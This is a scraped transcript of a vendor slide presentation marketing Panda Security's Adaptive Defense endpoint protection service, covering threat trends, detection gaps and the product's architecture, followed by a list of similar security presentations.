Presentation is loading. Please wait.

Presentation is loading. Please wait.

Panda Adaptive Defense Platform and Services

Published byYuliana Rachman Modified over 6 years ago

Similar presentations

Presentation on theme: "Panda Adaptive Defense Platform and Services"— Presentation transcript:

1 Panda Adaptive Defense Platform and Services
A New Endpoint Protection Paradigm Josu Franco. Strategy and Technology Advisor.

2 Dynamics of digital life. “Nexus of forces”
Our current digital behavior means a complex, interconnected, and hyper-dynamic environment. Now, the perimeter is where the user is. The complexity of IT systems increases vulnerability in the face of cyber-threats. The Evolution of the Cyber Attacks

3 The Target is the Endpoint.
Attackers need to reach the endpoint because from there, they can access other targets, exfiltrate information, steal credentials, gather intelligence, or deploy other attacks. % Incidents by Target Source: Verizon Data Breach Investigations Report 2016. The Malware Industry

4 The Gap is Getting Wider.
The figure shows how the percent of breaches where time to compromise/time to discovery was days or less is increasing. Attackers are more efficient now than ever before. Time to Compromise Time to Discover Source: Verizon Data Breach Investigations Report 2016. The Detection Gap

5 Challenge #1: “Malwareless” attacks.
Attackers exploit social engineering and vulnerabilities in the design of security products. “POWERWARE” attack No vulnerabilities exploited. No malicious URL involved. No malware file on disk. POWERSHELL encrypts files. Conventional defences won’t work. The Malware Industry

6 Challenge #2: Agent clutter prevents visibility.
Non-integrated solutions create complexity, performance issues, and lack of visibility. The Malware Industry

7 Challenge #3: Alert noise
Only 4% of alerts are ever investigated. “Two-thirds of the time spent by security staff responding to malware alerts is wasted because of faulty intelligence” “It costs organizations an average of $1.27 million annually in time wasted responding to erroneous or inaccurate malware alerts” 4% Source: Ponemon Institute. “The cost of malware containment”. n=630. The Malware Industry

8 The Prevailing Endpoint Security Paradigm…
… is based on punctual detection only of known malicious processes, this means that: All suspicious activity has to be investigated case by case. All unknown malicious processes are allowed. That’s why attackers skirt around these systems so easily, and their attacks’ success rate is so high. Suspicious More Effort The result is a higher success rate in attacks, a detection gap. More Risk Malware Unknown A New Approach to Endpoint Security

9 Malware Detection Gap: Blacklist Model.
Source: Panda Research. Jan.-Jun. 6 months. 16 M. samples) The Detection Gap

10 Panda Adaptive Defense security Paradigm.
It is based on the classification of absolutely all running processes on your network. All activity of all programs is monitored and analyzed in real-time. All behaviors are verified by a managed service, the admins don’t have to investigate anything. Higher level of protection, fewer efforts, and no risks for you. Real-time Visibility Integrated Forensic Analysis All processes are classified . Suspicious Managed Service Zero Risk No application can run if it is not trusted. The result is a higher protection rate with minimum effort. Malware Unknown Goodware A New Approach to Endpoint Security

11 Evolution of Panda Security Protection Capabilities
Panda Adaptive Defense, is a managed cybersecurity service based on three pillars: product, technologies and services, all designed to work together. Starting from the customer, all it needs is an agent in all endpoints that monitors all activity at the endpoint related to processes, network connections, registry, changes to the OS, access to data files, etc. This metadata is used by the Adaptive Defense Platform in the cloud and by Panda’s and Deloitte analysts, to determine the nature of each executable file and its behaviour. The data is also used to detect insiders or hackers who might be attempting to infiltrate the network, or exfiltrate data it they were already inside. The classification of all files is delivered through the 100% Attestation Service. In most cases (99,98% currently), this is performed automatically by the system using machine learning techniques. If needed, unknown applications are detonated in a custom-made array of physical sandboxes (not VMs, since they can be detected by malware) and their behaviour is extracted. The remaining 0,02% is delivered by analysts from Panda. The service will always cover 100% of the applications. However, as attackers evolve and adapt their methods, it is necessary to look beyond the classification of the files. It is necessary to hunt for attacks which can use other, more advanced methods. Therefore, Panda Security’s hunters jointly with Deloitte’s experts provides a Threat Hunting and Investigation Server. This service uses proprietary, machine learning algorithms and the expertise of threat hunters to spot anomalies and Indicators of Attacks across all endpoints protected by Adaptive Defense. Searches can be done in real-time and retrospectively by looking at the historical behaviour profiles of machines, applications and the network.. Adaptive Defense is managed through a cloud-based console, which provides deployment, configuration and reporting options at various levels. An Advanced Reporting Tool, accessible from the main AD console, offers in-depth visibility and insights about all the activity monitored at the endpoints (who is using which applications and when, which data is being accessed, which running applications are vulnerable, etc). This way, customers have real-time access to all the metadata being collected. The Adaptive Defense Platform can also be integrated with third party systems, via APIs or specifically with SIEM products, via a SIEM-Feeder, to augment the customer’s own security infrastructure. An important part of Panda’s strategy is to partner with Managed Security Service Providers and Managed Detection and Response providers. By leveraging the AD platform and its services, they can offer additional value, protection and insights, providing last-mile services tailored to each customer, understanding the context of each of them, hunting for targeted threats, helping them reduce the attack surface, or complementing the endpoint-based capabilities of Adaptive Defense with additional security management, for instance.

12 Architecture & components
Panda Security Architecture & components MSSP & MDR Panda Adaptive Defense, is a managed cybersecurity service based on three pillars: product, technologies and services, all designed to work together. Starting from the customer, all it needs is an agent in all endpoints that monitors all activity at the endpoint related to processes, network connections, registry, changes to the OS, access to data files, etc. This metadata is used by the Adaptive Defense Platform in the cloud and by Panda’s and Deloitte analysts, to determine the nature of each executable file and its behaviour. The data is also used to detect insiders or hackers who might be attempting to infiltrate the network, or exfiltrate data it they were already inside. The classification of all files is delivered through the 100% Attestation Service. In most cases (99,98% currently), this is performed automatically by the system using machine learning techniques. If needed, unknown applications are detonated in a custom-made array of physical sandboxes (not VMs, since they can be detected by malware) and their behaviour is extracted. The remaining 0,02% is delivered by analysts from Panda. The service will always cover 100% of the applications. However, as attackers evolve and adapt their methods, it is necessary to look beyond the classification of the files. It is necessary to hunt for attacks which can use other, more advanced methods. Therefore, Panda Security’s hunters jointly with Deloitte’s experts provides a Threat Hunting and Investigation Server. This service uses proprietary, machine learning algorithms and the expertise of threat hunters to spot anomalies and Indicators of Attacks across all endpoints protected by Adaptive Defense. Searches can be done in real-time and retrospectively by looking at the historical behaviour profiles of machines, applications and the network.. Adaptive Defense is managed through a cloud-based console, which provides deployment, configuration and reporting options at various levels. An Advanced Reporting Tool, accessible from the main AD console, offers in-depth visibility and insights about all the activity monitored at the endpoints (who is using which applications and when, which data is being accessed, which running applications are vulnerable, etc). This way, customers have real-time access to all the metadata being collected. The Adaptive Defense Platform can also be integrated with third party systems, via APIs or specifically with SIEM products, via a SIEM-Feeder, to augment the customer’s own security infrastructure. An important part of Panda’s strategy is to partner with Managed Security Service Providers and Managed Detection and Response providers. By leveraging the AD platform and its services, they can offer additional value, protection and insights, providing last-mile services tailored to each customer, understanding the context of each of them, hunting for targeted threats, helping them reduce the attack surface, or complementing the endpoint-based capabilities of Adaptive Defense with additional security management, for instance. Customers’ environment

13 Main Differentiators and Benefits.
100% Attestation Service and Threat Hunting and Investigation Service. Ensures trustability of all running process. Allows a continuous response to hackers and Insider threats. Closes the detection gap and adapts to the evolution of threats. Integrated Prevention, Detection and Response against malware and malwareless attacks. Eliminates agent clutter from multiple vendors. Simplifies management and reporting efforts. Cloud-based solution requires no maintenance costs and it is always up to date. Visibility of past and present endpoint activity, in one integrated architecture. Provides in-depth insight of all endpoint activity, not only malware. Autom>ated investigation, minimizes time spent on incidents. No alert noise. Enables scalability of managed security services and Managed Detection & Response. The Malware Industry

14 Reinventing Cybersecurity.

Download ppt "Panda Adaptive Defense Platform and Services"

Similar presentations

1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.

1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.
©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Mary Ann Fitzsimmons Regional.

©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Mary Ann Fitzsimmons Regional.
Security Life Cycle for Advanced Threats

Security Life Cycle for Advanced Threats
Introducing WatchGuard Dimension. Oceans of Log Data The 3 Dimensions of Big Data Volume –“Log Everything - Storage is Cheap” –Becomes too much data –

Introducing WatchGuard Dimension. Oceans of Log Data The 3 Dimensions of Big Data Volume –“Log Everything - Storage is Cheap” –Becomes too much data –
©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Chris Berninger, Sr. Solutions.

©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Chris Berninger, Sr. Solutions.
The Most Analytical and Comprehensive Defense Network in a Box.

The Most Analytical and Comprehensive Defense Network in a Box.
©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.

©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.
Www.encase.com Mel Pless, Sr. Director, Solutions Consulting Guidance Software, Inc. Let’s Get Right To The Endpoint Leveraging Endpoint Data to Expose,

Mel Pless, Sr. Director, Solutions Consulting Guidance Software, Inc. Let’s Get Right To The Endpoint Leveraging Endpoint Data to Expose,
Www.softwareassist.net Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.

Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.
The Most Analytical and Comprehensive Defense Network in a Box.

The Most Analytical and Comprehensive Defense Network in a Box.
Dell Connected Security Solutions Simplify & unify.

Dell Connected Security Solutions Simplify & unify.
©2014 Bit9. All Rights Reserved Endpoint Threat Prevention Charles Roussey | Sr. Sales Engineer Detection and Response in Seconds.

©2014 Bit9. All Rights Reserved Endpoint Threat Prevention Charles Roussey | Sr. Sales Engineer Detection and Response in Seconds.
Ali Alhamdan, PhD National Information Center Ministry of Interior

Ali Alhamdan, PhD National Information Center Ministry of Interior
Sky Advanced Threat Prevention

Sky Advanced Threat Prevention
MANAGED SECURITY TESTING PROACTIVELY MANAGING VULNERABILITIES.

MANAGED SECURITY TESTING PROACTIVELY MANAGING VULNERABILITIES.
Connected Security Your best defense against advanced threats Anne Aarness – Intel Security.

Connected Security Your best defense against advanced threats Anne Aarness – Intel Security.
BUFFERZONE Advanced Endpoint Security Data Connectors-Charlotte January 2016 Company Confidential.

BUFFERZONE Advanced Endpoint Security Data Connectors-Charlotte January 2016 Company Confidential.
Rapid Detection & Incident Response What, Why and How March 2016 Ft Gordon.

Rapid Detection & Incident Response What, Why and How March 2016 Ft Gordon.
©2016 Check Point Software Technologies Ltd. 1 Latest threats…. Rolando Panez | Security Engineer RANSOMWARE.

©2016 Check Point Software Technologies Ltd. 1 Latest threats…. Rolando Panez | Security Engineer RANSOMWARE.
1Copyright © 2015 Blue Coat Systems Inc. All Rights Reserved. BLUE COAT SYSTEMS CORPORATE OVERVIEW May 2015.

1Copyright © 2015 Blue Coat Systems Inc. All Rights Reserved. BLUE COAT SYSTEMS CORPORATE OVERVIEW May 2015.

Similar presentations

Ads by Google